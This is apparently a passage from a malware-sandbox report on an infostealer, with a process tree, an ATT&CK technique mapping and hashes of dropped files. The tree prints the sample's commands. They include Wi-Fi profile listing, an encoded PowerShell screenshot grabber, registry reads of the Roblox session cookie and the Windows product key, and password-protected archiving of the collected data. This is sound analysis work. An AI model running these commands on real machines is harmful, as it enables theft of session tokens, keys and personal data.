  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:3312
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
    3⤵
    - System Network Configuration Discovery: Wi-Fi Discovery
    - Suspicious use of WriteProcessMemory
    PID:4736
  - - C:\Windows\system32\netsh.exe
      netsh wlan show profile
      4⤵
      Event Triggered Execution: Netsh Helper DLL
      System Network Configuration Discovery: Wi-Fi Discovery
      PID:684
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "systeminfo"
    3⤵
    PID:2032
  - - C:\Windows\system32\systeminfo.exe
      systeminfo
      4⤵
      Gathers system information
      PID:4120
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
    3⤵
    PID:2708
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:4456
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\qx5heidk\qx5heidk.cmdline"
        5⤵
        
        PID:1788
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES9E05.tmp" "c:\Users\Admin\AppData\Local\Temp\qx5heidk\CSC87E7559C80B64D4F904B6986F9286335.TMP"
        6⤵
        
        PID:3524
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:4788
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:2304
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:5092
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:3836
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:4856
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:4656
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:4860
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:4468
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:3128
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:380
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
    3⤵
    PID:112
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:5104
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
    3⤵
    PID:1596
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:1580
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "getmac"
    3⤵
    PID:3132
  - - C:\Windows\system32\getmac.exe
      getmac
      4⤵
      PID:2068
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI35002\rar.exe a -r -hp"blank123" "C:\Users\Admin\AppData\Local\Temp\7m7Xg.zip" *"
    3⤵
    PID:4084
  - - C:\Users\Admin\AppData\Local\Temp\_MEI35002\rar.exe
      C:\Users\Admin\AppData\Local\Temp\_MEI35002\rar.exe a -r -hp"blank123" "C:\Users\Admin\AppData\Local\Temp\7m7Xg.zip" *
      4⤵
      Executes dropped EXE
      PID:4840
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic os get Caption"
    3⤵
    PID:4860
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic os get Caption
      4⤵
      PID:4744
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
    3⤵
    PID:4888
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic computersystem get totalphysicalmemory
      4⤵
      PID:1452
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
    3⤵
    PID:1808
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic csproduct get uuid
      4⤵
      PID:4812
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
    3⤵
    PID:1372
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:1948
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    PID:3084
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      PID:3916
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
    3⤵
    PID:1940
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:4668

C:\Program Files (x86)\Windows Media Player\wmplayer.exe
"C:\Program Files (x86)\Windows Media Player\wmplayer.exe" /Play -Embedding
1⤵
- Drops desktop.ini file(s)
- Enumerates connected drives
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious use of FindShellTrayWindow
PID:3356
- C:\Windows\SysWOW64\unregmp2.exe
  "C:\Windows\System32\unregmp2.exe" /AsyncFirstLogon
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2160
- - C:\Windows\system32\unregmp2.exe
    "C:\Windows\SysNative\unregmp2.exe" /AsyncFirstLogon /REENTRANT
    3⤵
    - Enumerates connected drives
    PID:1580

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s upnphost
1⤵
- Drops file in Windows directory
PID:4948

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
1⤵
- Drops file in Windows directory
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:3144
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffe82e5cc40,0x7ffe82e5cc4c,0x7ffe82e5cc58
  2⤵
  PID:2724
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1976,i,9589457486396435345,11178040720241361012,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1972 /prefetch:2
  2⤵
  PID:1344
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1788,i,9589457486396435345,11178040720241361012,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1964 /prefetch:3
  2⤵
  PID:1924
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2228,i,9589457486396435345,11178040720241361012,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2244 /prefetch:8
  2⤵
  PID:4848
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3100,i,9589457486396435345,11178040720241361012,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3144 /prefetch:1
  2⤵
  PID:4748
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3148,i,9589457486396435345,11178040720241361012,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3292 /prefetch:1
  2⤵
  PID:3312
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4440,i,9589457486396435345,11178040720241361012,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4428 /prefetch:1
  2⤵
  PID:1260
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4784,i,9589457486396435345,11178040720241361012,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4820 /prefetch:8
  2⤵
  PID:716
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4824,i,9589457486396435345,11178040720241361012,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4940 /prefetch:8
  2⤵
  PID:4616
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --field-trial-handle=4656,i,9589457486396435345,11178040720241361012,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4284 /prefetch:1
  2⤵
  PID:2856
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --field-trial-handle=3132,i,9589457486396435345,11178040720241361012,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5048 /prefetch:1
  2⤵
  PID:2760

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
1⤵
PID:2088

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
1⤵
PID:3852

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Privilege Escalation

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Defense Evasion

Obfuscated Files or Information

T1027

Command Obfuscation

T1027.010

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Peripheral Device Discovery

T1120

Process Discovery

T1057

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

System Network Configuration Discovery

T1016

Wi-Fi Discovery

T1016.002

Lateral Movement

Collection

Clipboard Data

T1115

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\92696073-6c3f-4514-b2ad-9d3d4e00de6f.tmp

Filesize
234KB

MD5
b31de06f2e1e5eb158ad854a00e58ace

SHA1
e2be0962f146a7d729f5a2ef2853567f0fd90699

SHA256
862155b497c8e5f65ec71f50ed28dc2c67257ae488d1d2245efdc890956f3099

SHA512
e4509cc065759844cc7c12db9f0ff79918bd0c8ba488638dd0c05dfce4e1fac98ae1930cde16bbd9cc89238dfd3fa0b2c65dca8dbe0fda36a51fa8600b7fdb6e

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\BrowsingTopicsState

Filesize
649B

MD5
1bcce43760c448de1c50f03da86d7eb2

SHA1
059248157de403da7127ca1a6b5dcbddb8af4675

SHA256
3917c13df5bc77097afc8b8ea6573d70c42642374ad4c43070f7f81444b3d0a2

SHA512
bf12dd5a207eb1c6121d8e2013de0503857cdf490f88816c8c7f464ef751cb6e8417ee4106c750ed7bbb377d9c68b8e0dac8e17ef355dfe8b7171a711a4ccadc

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
840B

MD5
3977978de89ddc6c4b3acb903c35a387

SHA1
c360d1785936b655a17d4d990c399f83845fdc94

SHA256
55fde6f2bb20ec3651cc87efe08948ac1708b0d2f75ff53e803dbcb10e5b88f7

SHA512
dc84d8f5ff8dc7bea618543c1aba61f528f0d44d4b3fd56acd84c5166a24d7dc3144876b4abf860186c949e2b542866200defd922f56d3a8233c052a8494f2b5

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\DawnCache\data_1

Filesize
264KB

MD5
f50f89a0a91564d0b8a211f8921aa7de

SHA1
112403a17dd69d5b9018b8cede023cb3b54eab7d

SHA256
b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec

SHA512
bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\011c9902-247c-45b2-a9ce-ab56a092c622.tmp

Filesize
690B

MD5
7e7dd1e1c37b00383a3996c2435d36c6

SHA1
02930e44b085e07de78169966f28b8cbcd15ad04

SHA256
11ae320b1576dff5f2677054b4134a45b1fbc5f3f33799662cf3ef8c469ea536

SHA512
